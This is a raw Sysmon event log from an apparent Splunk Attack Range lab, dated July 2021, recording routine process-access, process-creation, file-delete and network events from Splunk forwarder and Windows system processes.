08:01:27.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:27.625{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F6D7-60EB-B779-00000000D001}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.625{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D7-60EB-B779-00000000D001}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.610{0C1E0330-F6D7-60EB-B779-00000000D001}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809248Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:27.078{0C1E0330-F6D6-60EB-B679-00000000D001}23601904C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809279Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.969{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F1907AB479264704425ED144C380F99,SHA256=7AE21F78F819F8055642044FE96FC057C94F32D2AC5A1466BB05B945E33B1888,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:28.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BDF3071A1BAC0F398DE7FA5496EB029,SHA256=B1EA4295FB322F9EF56274C74244C121E874D734F364C45A0D1956C06FC06622,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809278Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.469{0C1E0330-F6D8-60EB-B879-00000000D001}32401576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809277Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F6D8-60EB-B879-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809276Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809275Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809274Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809273Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809272Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809271Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:28.313{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.313{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F6D8-60EB-B879-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.297{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F6D8-60EB-B879-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.298{0C1E0330-F6D8-60EB-B879-00000000D001}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:28.063{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C697E80B749F186D987DD49F2BA42DF8,SHA256=467979AF05262094BE57EBBB32BDB700EAFC922931D0AC11705A4FE6039E5680,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:29.302{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=855A3FDD63BF05925712924915BC9D36,SHA256=38BDA96D5220CAE8CBB58BA17C908D5EB6F4610C3D669CFB36C6D18DE5D0F853,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809280Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:29.328{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=060D3544C25DC422763810E3AB4A5B9E,SHA256=DF1B8F717BAED8FEC266AC81B03689749DD59031814D034BE6369B9444F4F837,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:30.317{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E0AA4AE2E845CDBF9ED92CD30FF98EB,SHA256=4EBF30364C0FD59DA3F148CF8E921292F8381C2ED542D4EF6A91C83DE75F0D25,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:29.180{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57383-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809282Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:30.172{0C1E0330-0490-60E8-1200-00000000D001}980NT 
AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=29D811663DEE001978DD5A2812F60FB4,SHA256=A2C9D6ECED993D51525D50093449620B577956487F4DE239F6C5B50F049F649B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809281Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:30.000{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E732CCFF3B16CD17CA98C5C1AC676E73,SHA256=69F12BCB2DA20FD35E6DDDDC28E0018A3E23D0BED451143DC136AD44322B12D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:30.170{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:30.170{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:31.347{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A6BAEE15271131C8C46F96EF3BC10E9,SHA256=0D23F2B2AC164B6CE794025D8C83E0871A1886EBF3B7E41D736A604DAA0659AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:31.000{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=456E35C459E657C3C7EF23E0DAECFC7F,SHA256=ED9C4C6DA4F1F1AA3DCCA624773CC6E7E244F470A5A65D1026D7FE8E79A0C501,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:32.364{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
